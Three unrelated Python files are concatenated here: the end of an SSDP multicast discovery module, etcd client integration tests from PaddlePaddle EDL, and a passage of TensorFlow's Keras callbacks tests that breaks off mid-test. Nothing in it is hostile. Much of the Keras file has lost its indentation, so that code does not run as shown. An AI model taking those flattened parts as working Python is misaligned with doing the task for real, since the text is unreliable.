            self.fhdhr.logger.info("Sending Alive message to network.")
            self.do_notify(self.broadcast_address_tuple)

    def do_notify(self, address):
        """
        Send every enabled plugin's NOTIFY payload(s) to `address`.
        """
        notify_list = []
        for ssdp_handler in list(self.ssdp_handling.keys()):
            if self.ssdp_handling[ssdp_handler].enabled and hasattr(self.ssdp_handling[ssdp_handler], 'notify'):
                notify_data = self.ssdp_handling[ssdp_handler].notify
                # A plugin may provide one payload or a list of payloads.
                if isinstance(notify_data, list):
                    notify_list.extend(notify_data)
                else:
                    notify_list.append(notify_data)
        for notifydata in notify_list:
            notifydata = notifydata.encode("utf-8")
            self.fhdhr.logger.ssdp("Created {}".format(notifydata))
            try:
                self.sock.sendto(notifydata, address)
            except OSError as e:
                # Most commonly: We received a multicast from an IP not in our subnet
                self.fhdhr.logger.ssdp("Unable to send NOTIFY: %s" % e)

    def on_recv(self, data, address):
        """
        Handle a received SSDP packet: parse headers, fan out to plugins,
        and answer M-SEARCH discovery requests.
        """
        self.fhdhr.logger.ssdp("Received packet from {}: {}".format(address, data))
        try:
            header, payload = data.decode().split('\r\n\r\n')[:2]
        except ValueError:
            self.fhdhr.logger.error("Error with Received packet from {}: {}".format(address, data))
            return
        lines = header.split('\r\n')
        cmd = lines[0].split(' ')
        # Normalize "Key: Value" lines into a lowercase-keyed dict.
        lines = map(lambda x: x.replace(': ', ':', 1), lines[1:])
        lines = filter(lambda x: len(x) > 0, lines)
        headers = [x.split(':', 1) for x in lines]
        headers = dict(map(lambda x: (x[0].lower(), x[1]), headers))
        # Give every enabled plugin a look at the raw request first.
        for ssdp_handler in list(self.ssdp_handling.keys()):
            if self.ssdp_handling[ssdp_handler].enabled and hasattr(self.ssdp_handling[ssdp_handler], 'on_recv'):
                self.ssdp_handling[ssdp_handler].on_recv(headers, cmd, list(self.ssdp_handling.keys()))
        if cmd[0] == 'M-SEARCH' and cmd[1] == '*':
            # SSDP discovery
            self.fhdhr.logger.ssdp("Received qualifying M-SEARCH from {}".format(address))
            self.fhdhr.logger.ssdp("M-SEARCH data: {}".format(headers))
            self.do_notify(address)
        # BUGFIX: this was a separate `if`, so a handled M-SEARCH also fell
        # through to the "Unknown SSDP command" branch below.
        elif cmd[0] == 'NOTIFY' and cmd[1] == '*':
            self.fhdhr.logger.ssdp("NOTIFY data: {}".format(headers))
        else:
            self.fhdhr.logger.ssdp('Unknown SSDP command %s %s' % (cmd[0], cmd[1]))

    def m_search(self):
        """
        Search the network for SSDP devices.
        """
        data = self.msearch_payload
        if self.broadcast_address_tuple:
            self.sock.sendto(data, self.broadcast_address_tuple)

    def create_msearch_payload(self):
        """
        Build the M-SEARCH discovery request as UTF-8 bytes.
        """
        data = ''
        data_command = "M-SEARCH * HTTP/1.1"
        # NOTE(review): UPnP 1.1 specifies MAN: "ssdp:discover" with quotes —
        # confirm peers accept the unquoted form before changing it.
        data_dict = {
            "HOST": "%s:%s" % (self.broadcast_ip, 1900),
            "MAN": "ssdp:discover",
            "ST": "ssdp:all",
            "MX": 1,
        }
        data += "%s\r\n" % data_command
        for data_key in list(data_dict.keys()):
            data += "%s:%s\r\n" % (data_key, data_dict[data_key])
        data += "\r\n"
        return data.encode("utf-8")

    @property
    def multicast_address(self):
        """
        The address to listen on: [ssdp]multicast_address, falling back to
        [fhdhr]discovery_address, else None (SSDP disabled).
        """
        if self.fhdhr.config.dict["ssdp"]["multicast_address"]:
            return self.fhdhr.config.dict["ssdp"]["multicast_address"]
        elif self.fhdhr.config.dict["fhdhr"]["discovery_address"]:
            return self.fhdhr.config.dict["fhdhr"]["discovery_address"]
        return None

    def setup_ssdp(self):
        """
        Create and configure the UDP socket (proto, interface, multicast).
        """
        self.sock = None
        self.proto = self.setup_proto()
        self.iface = self.fhdhr.config.dict["ssdp"]["iface"]
        self.setup_addressing()
        self.sock = socket.socket(self.af_type, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.setup_interface()
        self.setup_multicasting()

    def setup_proto(self):
        """
        Validate and return the configured protocol ("ipv4" or "ipv6").
        """
        proto = self.fhdhr.config.dict["ssdp"]["proto"]
        allowed_protos = ("ipv4", "ipv6")
        if proto not in allowed_protos:
            raise ValueError("Invalid proto - expected one of {}".format(allowed_protos))
        return proto

    def setup_addressing(self):
        """
        Derive address family, multicast group and bind address from proto.
        """
        if self.proto == "ipv4":
            self.af_type = socket.AF_INET
            self.broadcast_ip = "239.255.255.250"
            self.broadcast_address_tuple = (self.broadcast_ip, 1900)
            self.bind_address = "0.0.0.0"
        elif self.proto == "ipv6":
            self.af_type = socket.AF_INET6
            self.broadcast_ip = "ff02::c"
            # IPv6 sendto addresses carry (host, port, flowinfo, scope_id).
            self.broadcast_address_tuple = (self.broadcast_ip, 1900, 0, 0)
            self.bind_address = "::"
        else:
            self.broadcast_address_tuple = None

    def setup_interface(self):
        """
        Bind the socket to a specific network interface if one is configured.
        """
        # Bind to specific interface
        if self.iface is not None:
            self.sock.setsockopt(socket.SOL_SOCKET, getattr(socket, "SO_BINDTODEVICE", 25), self.iface)

    def setup_multicasting(self):
        """
        Join the SSDP multicast group for the configured protocol.
        """
        # Subscribe to multicast address
        if self.proto == "ipv4":
            mreq = socket.inet_aton(self.broadcast_ip)
            if self.multicast_address is not None:
                mreq += socket.inet_aton(self.multicast_address)
            else:
                mreq += struct.pack(b"@I", socket.INADDR_ANY)
            self.sock.setsockopt(
                socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
            # Allow multicasts on loopback devices (necessary for testing)
            self.sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_LOOP, 1)
        elif self.proto == "ipv6":
            # In IPv6 we use the interface index, not the address when subscribing to the group
            mreq = socket.inet_pton(socket.AF_INET6, self.broadcast_ip)
            if self.iface is not None:
                iface_index = socket.if_nametoindex(self.iface)
                # Send outgoing packets from the same interface
                self.sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_MULTICAST_IF, iface_index)
                mreq += struct.pack(b"@I", iface_index)
            else:
                mreq += socket.inet_pton(socket.AF_INET6, "::")
            self.sock.setsockopt(
                socket.IPPROTO_IPV6, socket.IPV6_JOIN_GROUP, mreq,
            )
            self.sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_MULTICAST_LOOP, 1)
|
etcd_client_test.py | # Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import time
import unittest
from edl.discovery.etcd_client import EtcdClient
from edl.utils import string_utils
class TestEtcd(unittest.TestCase):
    """Integration tests for EtcdClient.

    NOTE(review): these tests require a reachable etcd server and rely on
    real lease TTLs (hence the long sleeps) — they are not unit tests.
    """

    def setUp(self):
        self.etcd = EtcdClient()
        self.etcd.init()

    def add(self):
        # Register two servers under job_1 and verify they round-trip.
        local_servers = {"127.0.0.1:1": "first", "127.0.0.1:2": "second"}
        for k, v in local_servers.items():
            self.etcd.set_server_not_exists("job_1", k, v)
        servers = self.etcd.get_service("job_1")
        assert len(servers) == 2, "must two servers"
        for server_meta in servers:
            # etcd returns bytes; compare via the project's decoding helper.
            value = local_servers[string_utils.bytes_to_string(server_meta.server)]
            assert value == string_utils.bytes_to_string(server_meta.info)

    def refresh(self):
        # Renew both leases so the keys stay alive.
        self.etcd.refresh("job_1", "127.0.0.1:1")
        self.etcd.refresh("job_1", "127.0.0.1:2")

    def get_service(self):
        # Called after the TTL elapsed: expired keys must be gone.
        servers = self.etcd.get_service("job_1")
        assert len(servers) == 0, "key must not alive when expired."
        self.etcd.refresh("job_1", "127.0.0.1:1")

    def remove_service(self):
        self.etcd.remove_service("job_1")
        servers = self.etcd.get_service("job_1")
        assert len(servers) == 0, "key must not alive after sevice is deleted."

    def test_etcd(self):
        # End-to-end: add, remove, re-add, refresh, then let the lease expire.
        self.add()
        self.etcd.remove_service("job_1")
        self.add()
        self.refresh()
        time.sleep(15)  # longer than the lease TTL, so the keys expire
        self.get_service()

    def update_key(self):
        # Helper run on a thread by test_watch to trigger a watch event.
        self.etcd.set_server_not_exists("job_2", "127.0.0.1:1", "first")

    def test_watch(self):
        # Watch job_2, mutate it from another thread, expect one put event.
        events = []

        def watch_call_back(add_servers, rm_servers):
            for server_meta in add_servers:
                print(
                    "put server:{} value:{}".format(
                        server_meta.server, server_meta.info
                    )
                )
                events.append(server_meta)
            for server_meta in rm_servers:
                print(
                    "delete server:{} value:{}".format(
                        server_meta.server, server_meta.info
                    )
                )
                events.append(server_meta)

        watch_id = self.etcd.watch_service("job_2", watch_call_back)
        t = threading.Thread(name="update_key_prefix", target=self.update_key)
        t.start()
        t.join()
        print("watch_id:", watch_id)
        time.sleep(3)  # give the watcher time to deliver the event
        self.etcd.cancel_watch(watch_id)
        print("events len:", len(events))
        assert len(events) == 1
        assert string_utils.bytes_to_string(events[0].server) == "127.0.0.1:1"
        assert string_utils.bytes_to_string(events[0].info) == "first"

    def test_lease(self):
        # Repeated refreshes within the TTL must keep both servers alive.
        self.add()
        for i in range(20):
            self.refresh()
            servers = self.etcd.get_service("job_1")
            assert len(servers) == 2, "must two servers"
            time.sleep(2)

    def test_permanent(self):
        # A key promoted to permanent must survive past the original TTL.
        self.etcd.set_server_not_exists("job_permanent", "127.0.0.1:1", "first", ttl=6)
        self.etcd.set_server_permanent("job_permanent", "127.0.0.1:1", "first")
        time.sleep(10)
        servers = self.etcd.get_service("job_permanent")
        assert len(servers) == 1, "server must exist"
if __name__ == "__main__":
    # Run the etcd integration tests directly (requires a live etcd server).
    unittest.main()
|
callbacks_test.py | # Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Keras callbacks."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import csv
import os
import re
import shutil
import sys
import threading
import unittest
from absl.testing import parameterized
import numpy as np
from tensorflow.python import keras
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.framework import random_seed
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.keras.engine import base_layer
from tensorflow.python.keras.engine import sequential
from tensorflow.python.keras.optimizer_v2 import gradient_descent
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.summary import summary_iterator
from tensorflow.python.training import adam
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
try:
import requests # pylint:disable=g-import-not-at-top
except ImportError:
requests = None
TRAIN_SAMPLES = 10
TEST_SAMPLES = 10
NUM_CLASSES = 2
INPUT_DIM = 3
NUM_HIDDEN = 5
BATCH_SIZE = 5
class Counter(keras.callbacks.Callback):
  """Counts the number of times each callback method was run.

  Attributes:
    method_counts: dict. Contains the counts of time each callback method was
      run.
  """

  def __init__(self):
    self.method_counts = collections.defaultdict(int)
    # Every hook follows the on_<stage>_begin / on_<stage>_end pattern; wrap
    # each one so calls are tallied before delegating to the inherited method.
    stages = ('batch', 'epoch', 'predict_batch', 'predict', 'test_batch',
              'test', 'train_batch', 'train')
    for stage in stages:
      for moment in ('begin', 'end'):
        method_name = 'on_{}_{}'.format(stage, moment)
        setattr(self, method_name,
                self.wrap_with_counts(method_name, getattr(self, method_name)))

  def wrap_with_counts(self, method_name, method):
    """Returns `method` wrapped to increment its count on every call."""

    def _counted(*args, **kwargs):
      self.method_counts[method_name] += 1
      return method(*args, **kwargs)

    return _counted
def _get_numpy():
return np.ones((10, 10)), np.ones((10, 1))
def _get_sequence():
  """Returns (Sequence yielding 5 all-ones batches, None) mirroring _get_numpy."""

  class _OnesSequence(keras.utils.data_utils.Sequence):

    def __getitem__(self, _):
      # Every batch is identical: 2 samples of ones with matching labels.
      return np.ones((2, 10)), np.ones((2, 1))

    def __len__(self):
      return 5

  return _OnesSequence(), None
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
class CallbackCountsTest(keras_parameterized.TestCase):
  """Verifies how often each callback hook fires in fit/evaluate/predict."""

  def _check_counts(self, counter, expected_counts):
    """Checks that the counts registered by `counter` are those expected."""
    for method_name, expected_count in expected_counts.items():
      self.assertEqual(
          counter.method_counts[method_name],
          expected_count,
          msg='For method {}: expected {}, got: {}'.format(
              method_name, expected_count, counter.method_counts[method_name]))

  def _get_model(self):
    # Small two-layer binary classifier, compiled per the active keras mode.
    layers = [
        keras.layers.Dense(10, activation='relu'),
        keras.layers.Dense(1, activation='sigmoid')
    ]
    model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
    model.compile(
        adam.AdamOptimizer(0.001),
        'binary_crossentropy',
        run_eagerly=testing_utils.should_run_eagerly())
    return model

  @parameterized.named_parameters(('with_numpy', _get_numpy()),
                                  ('with_sequence', _get_sequence()))
  def test_callback_hooks_are_called_in_fit(self, data):
    x, y = data
    val_x, val_y = np.ones((4, 10)), np.ones((4, 1))
    model = self._get_model()
    counter = Counter()
    model.fit(
        x,
        y,
        validation_data=(val_x, val_y),
        batch_size=2,
        epochs=5,
        callbacks=[counter])
    # 5 train batches per epoch x 5 epochs = 25; 2 val batches x 5 = 10.
    self._check_counts(
        counter, {
            'on_batch_begin': 25,
            'on_batch_end': 25,
            'on_epoch_begin': 5,
            'on_epoch_end': 5,
            'on_predict_batch_begin': 0,
            'on_predict_batch_end': 0,
            'on_predict_begin': 0,
            'on_predict_end': 0,
            'on_test_batch_begin': 10,
            'on_test_batch_end': 10,
            'on_test_begin': 5,
            'on_test_end': 5,
            'on_train_batch_begin': 25,
            'on_train_batch_end': 25,
            'on_train_begin': 1,
            'on_train_end': 1
        })

  @parameterized.named_parameters(('with_numpy', _get_numpy()),
                                  ('with_sequence', _get_sequence()))
  def test_callback_hooks_are_called_in_evaluate(self, data):
    x, y = data
    model = self._get_model()
    counter = Counter()
    model.evaluate(x, y, batch_size=2, callbacks=[counter])
    # 10 samples / batch_size 2 = 5 test batches, one begin/end pair overall.
    self._check_counts(
        counter, {
            'on_test_batch_begin': 5,
            'on_test_batch_end': 5,
            'on_test_begin': 1,
            'on_test_end': 1
        })

  @parameterized.named_parameters(('with_numpy', _get_numpy()),
                                  ('with_sequence', _get_sequence()))
  def test_callback_hooks_are_called_in_predict(self, data):
    x = data[0]
    model = self._get_model()
    counter = Counter()
    model.predict(x, batch_size=2, callbacks=[counter])
    # 10 samples / batch_size 2 = 5 predict batches.
    self._check_counts(
        counter, {
            'on_predict_batch_begin': 5,
            'on_predict_batch_end': 5,
            'on_predict_begin': 1,
            'on_predict_end': 1
        })

  def test_callback_list_methods(self):
    # Calling CallbackList hooks directly must forward to every callback once.
    counter = Counter()
    callback_list = keras.callbacks.CallbackList([counter])

    batch = 0
    callback_list.on_test_batch_begin(batch)
    callback_list.on_test_batch_end(batch)
    callback_list.on_predict_batch_begin(batch)
    callback_list.on_predict_batch_end(batch)

    self._check_counts(
        counter, {
            'on_test_batch_begin': 1,
            'on_test_batch_end': 1,
            'on_predict_batch_begin': 1,
            'on_predict_batch_end': 1
        })
class KerasCallbacksTest(keras_parameterized.TestCase):
def _get_model(self, input_shape=None):
layers = [
keras.layers.Dense(3, activation='relu'),
keras.layers.Dense(2, activation='softmax')
]
model = testing_utils.get_model_from_layers(layers, input_shape=input_shape)
model.compile(
loss='mse',
optimizer='rmsprop',
metrics=[keras.metrics.CategoricalAccuracy(name='my_acc')],
run_eagerly=testing_utils.should_run_eagerly())
return model
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes
def test_progbar_logging(self):
model = self._get_model(input_shape=(3,))
x = array_ops.ones((50, 3))
y = array_ops.zeros((50, 2))
dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegexpMatches(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types(exclude_models='functional')
@keras_parameterized.run_all_keras_modes
def test_progbar_logging_deferred_model_build(self):
model = self._get_model()
self.assertFalse(model.built)
x = array_ops.ones((50, 3))
y = array_ops.zeros((50, 2))
dataset = dataset_ops.Dataset.from_tensor_slices((x, y)).batch(10)
expected_log = r'(.*- loss:.*- my_acc:.*)+'
with self.captureWritesToStream(sys.stdout) as printed:
model.fit(dataset, epochs=2, steps_per_epoch=10)
self.assertRegexpMatches(printed.contents(), expected_log)
@keras_parameterized.run_with_all_model_types
def test_ModelCheckpoint(self):
if h5py is None:
return # Skip test if models cannot be saved.
layers = [
keras.layers.Dense(NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'),
keras.layers.Dense(NUM_CLASSES, activation='softmax')
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10,))
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
temp_dir = self.get_temp_dir()
self.addCleanup(shutil.rmtree, temp_dir, ignore_errors=True)
filepath = os.path.join(temp_dir, 'checkpoint.h5')
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.to_categorical(y_test)
y_train = keras.utils.to_categorical(y_train)
# case 1
monitor = 'val_loss'
save_best_only = False
mode = 'auto'
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 2
mode = 'min'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 3
mode = 'max'
monitor = 'val_acc'
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# case 4
save_best_only = True
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
assert os.path.exists(filepath)
os.remove(filepath)
# Case: metric not available.
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor='unknown',
save_best_only=True)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1,
verbose=0)
# File won't be written.
assert not os.path.exists(filepath)
# case 5
save_best_only = False
period = 2
mode = 'auto'
filepath = os.path.join(temp_dir, 'checkpoint.{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
period=period)
]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=4,
verbose=1)
assert os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=4))
os.remove(filepath.format(epoch=2))
os.remove(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=3))
# Invalid use: this will raise a warning but not an Exception.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode='unknown')
# Case 6: `ModelCheckpoint` with a combination of `save_freq` and `period`.
# Though `period` is deprecated, we're testing it for
# backward-compatibility.
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath, monitor=monitor, mode=mode, save_freq='epoch', period=5)
]
assert not os.path.exists(filepath.format(epoch=0))
assert not os.path.exists(filepath.format(epoch=5))
model.fit(
x_train,
y_train,
batch_size=2,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=10,
verbose=1)
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=2))
assert not os.path.exists(filepath.format(epoch=3))
assert not os.path.exists(filepath.format(epoch=4))
assert os.path.exists(filepath.format(epoch=5))
assert not os.path.exists(filepath.format(epoch=6))
assert os.path.exists(filepath.format(epoch=10))
os.remove(filepath.format(epoch=5))
os.remove(filepath.format(epoch=10))
# Case 7: `ModelCheckpoint` with an integer `save_freq`
filepath = os.path.join(temp_dir, 'checkpoint.epoch{epoch:02d}.h5')
cbks = [
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq=30,
period=100) # The period should be ignored (this test tests this).
]
assert not os.path.exists(filepath.format(epoch=3))
model.fit(
x_train,
y_train,
batch_size=2,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=10,
verbose=1)
assert not os.path.exists(filepath.format(epoch=1))
assert not os.path.exists(filepath.format(epoch=2))
assert os.path.exists(filepath.format(epoch=3))
assert not os.path.exists(filepath.format(epoch=4))
assert not os.path.exists(filepath.format(epoch=5))
assert os.path.exists(filepath.format(epoch=6))
assert not os.path.exists(filepath.format(epoch=7))
assert not os.path.exists(filepath.format(epoch=8))
assert os.path.exists(filepath.format(epoch=9))
os.remove(filepath.format(epoch=3))
os.remove(filepath.format(epoch=6))
os.remove(filepath.format(epoch=9))
# Case 8: `ModelCheckpoint` with valid and invalid save_freq argument.
with self.assertRaisesRegexp(ValueError, 'Unrecognized save_freq'):
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq='invalid_save_freq')
# The following should not raise ValueError.
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq='epoch')
keras.callbacks.ModelCheckpoint(
filepath,
monitor=monitor,
save_best_only=save_best_only,
mode=mode,
save_freq=3)
def _run_load_weights_on_restart_test_common_iterations(self):
  """Shared setup for the `load_weights_on_restart` tests.

  Fits a trivial bias-only model for 3 epochs with a `ModelCheckpoint`,
  then one more epoch without the callback, and returns the artifacts the
  individual tests need.

  Returns:
    Tuple of (model, train_ds, checkpoint filepath, weights after the
    extra no-callback epoch).
  """

  def get_input_datasets():
    # Simple training input.
    train_input = [[1]] * 16
    train_label = [[0]] * 16
    ds = dataset_ops.Dataset.from_tensor_slices((train_input, train_label))
    return ds.batch(8, drop_remainder=True)

  class Bias(base_layer.Layer):
    # Single scalar bias; output = input + bias.

    def build(self, input_shape):
      self.bias = self.add_variable('bias', (1,), initializer='zeros')

    def call(self, inputs):
      return inputs + self.bias

  # Very simple bias model to eliminate randomness.
  optimizer = gradient_descent.SGD(0.1)
  model = sequential.Sequential()
  model.add(Bias(input_shape=(1,)))
  model.compile(loss='mae', optimizer=optimizer, metrics=['mae'])
  train_ds = get_input_datasets()

  filepath = os.path.join(self.get_temp_dir(), 'checkpoint.h5')

  # The filepath shouldn't exist at the beginning.
  self.assertFalse(os.path.exists(filepath))
  model.fit(
      train_ds,
      epochs=3,
      callbacks=[
          keras.callbacks.ModelCheckpoint(
              filepath=filepath, save_weights_only=True)
      ])

  # The filepath should exist after fitting with callback.
  self.assertTrue(os.path.exists(filepath))
  model.fit(train_ds, epochs=1)
  weights_after_one_more_epoch = model.get_weights()

  # The filepath should continue to exist after fitting without callback.
  self.assertTrue(os.path.exists(filepath))

  return model, train_ds, filepath, weights_after_one_more_epoch
@staticmethod
def get_ModelCheckpoint_load_weights_on_restart_true_test(save_weights_only):
  """Build a test verifying `load_weights_on_restart=True` restores weights.

  Args:
    save_weights_only: Forwarded to `ModelCheckpoint`.

  Returns:
    A test function suitable for binding as a test method.
  """

  def func(self):
    (model, train_ds, filepath, weights_after_one_more_epoch
    ) = self._run_load_weights_on_restart_test_common_iterations()

    model.fit(
        train_ds,
        epochs=1,
        callbacks=[
            keras.callbacks.ModelCheckpoint(
                filepath=filepath,
                save_weights_only=save_weights_only,
                load_weights_on_restart=True)
        ])
    weights_after_model_restoring_and_one_more_epoch = model.get_weights()

    # Asserting the weights one epoch after initial fitting and another epoch
    # after that are closed, if a ModelCheckpoint with
    # load_weights_on_restart=True is given (so the model is restored at the
    # beginning of training).
    self.assertAllClose(weights_after_one_more_epoch,
                        weights_after_model_restoring_and_one_more_epoch)

  return func
@staticmethod
def get_ModelCheckpoint_load_weights_on_restart_false_test(save_weights_only):
  """Build a test verifying the default (no-restore) checkpoint behavior.

  Args:
    save_weights_only: Forwarded to `ModelCheckpoint`.

  Returns:
    A test function suitable for binding as a test method.
  """

  def func(self):
    (model, train_ds, filepath, weights_after_one_more_epoch
    ) = self._run_load_weights_on_restart_test_common_iterations()

    model.fit(
        train_ds,
        epochs=1,
        callbacks=[
            keras.callbacks.ModelCheckpoint(
                filepath=filepath, save_weights_only=save_weights_only)
        ])
    weights_after_model_restoring_and_one_more_epoch = model.get_weights()

    # Asserting the weights one epoch after initial fitting and another epoch
    # after that are different, if a ModelCheckpoint with
    # load_weights_on_restart=False is given (so the model is not restored at
    # the beginning of training).
    self.assertNotAllClose(weights_after_one_more_epoch,
                           weights_after_model_restoring_and_one_more_epoch)

  return func
# Materialize the parameterized load_weights_on_restart tests at class
# definition time. `.__func__` unwraps the staticmethod object so the
# factory can be called while the class body is still executing.
test_model_checkpoint_load_weights_on_restart_true_save_weights_only_true = \
    get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(True)

test_model_checkpoint_load_weights_on_restart_true_save_weights_only_false = \
    get_ModelCheckpoint_load_weights_on_restart_true_test.__func__(False)

test_model_checkpoint_load_weights_on_restart_false_save_weights_only_true = \
    get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(True)

test_model_checkpoint_load_weights_on_restart_false_save_weights_only_false \
    = get_ModelCheckpoint_load_weights_on_restart_false_test.__func__(False)
def test_ModelCheckpoint_override_if_file_exist(self):
  """An existing checkpoint file is overwritten by a subsequent fit."""
  (model, train_ds, filepath,
   _) = self._run_load_weights_on_restart_test_common_iterations()

  # Snapshot the weights currently stored in the checkpoint file.
  model.load_weights(filepath)
  weights_before_additional_fit = model.get_weights()
  model.fit(
      train_ds,
      epochs=1,
      callbacks=[
          keras.callbacks.ModelCheckpoint(
              filepath=filepath, save_weights_only=True)
      ])
  model.load_weights(filepath)
  weights_after_additional_fit = model.get_weights()

  # The file must now contain the newly-trained weights, not the old ones.
  self.assertNotAllClose(weights_before_additional_fit,
                         weights_after_additional_fit)
def test_EarlyStopping(self):
  """Smoke-test `EarlyStopping` across mode/monitor combinations."""
  with self.cached_session():
    np.random.seed(123)
    (x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
        train_samples=TRAIN_SAMPLES,
        test_samples=TEST_SAMPLES,
        input_shape=(INPUT_DIM,),
        num_classes=NUM_CLASSES)
    y_test = keras.utils.to_categorical(y_test)
    y_train = keras.utils.to_categorical(y_train)
    model = testing_utils.get_small_sequential_mlp(
        num_hidden=NUM_HIDDEN, num_classes=NUM_CLASSES, input_dim=INPUT_DIM)
    model.compile(
        loss='categorical_crossentropy', optimizer='rmsprop', metrics=['acc'])

    # The ('unknown', 'unknown') entry exercises the fallback paths for an
    # unrecognized mode/monitor.
    cases = [
        ('max', 'val_acc'),
        ('min', 'val_loss'),
        ('auto', 'val_acc'),
        ('auto', 'loss'),
        ('unknown', 'unknown')
    ]
    for mode, monitor in cases:
      patience = 0
      cbks = [
          keras.callbacks.EarlyStopping(
              patience=patience, monitor=monitor, mode=mode)
      ]
      model.fit(
          x_train,
          y_train,
          batch_size=BATCH_SIZE,
          validation_data=(x_test, y_test),
          callbacks=cbks,
          epochs=5,
          verbose=0)
def test_EarlyStopping_reuse(self):
  """A single `EarlyStopping` instance can be reused across fits."""
  with self.cached_session():
    np.random.seed(1337)
    patience = 3
    data = np.random.random((100, 1))
    labels = np.where(data > 0.5, 1, 0)
    model = keras.models.Sequential((keras.layers.Dense(
        1, input_dim=1, activation='relu'), keras.layers.Dense(
            1, activation='sigmoid'),))
    model.compile(
        optimizer='sgd', loss='binary_crossentropy', metrics=['accuracy'])
    weights = model.get_weights()

    stopper = keras.callbacks.EarlyStopping(monitor='acc', patience=patience)
    hist = model.fit(data, labels, callbacks=[stopper], verbose=0, epochs=20)
    assert len(hist.epoch) >= patience

    # This should allow training to go for at least `patience` epochs
    model.set_weights(weights)
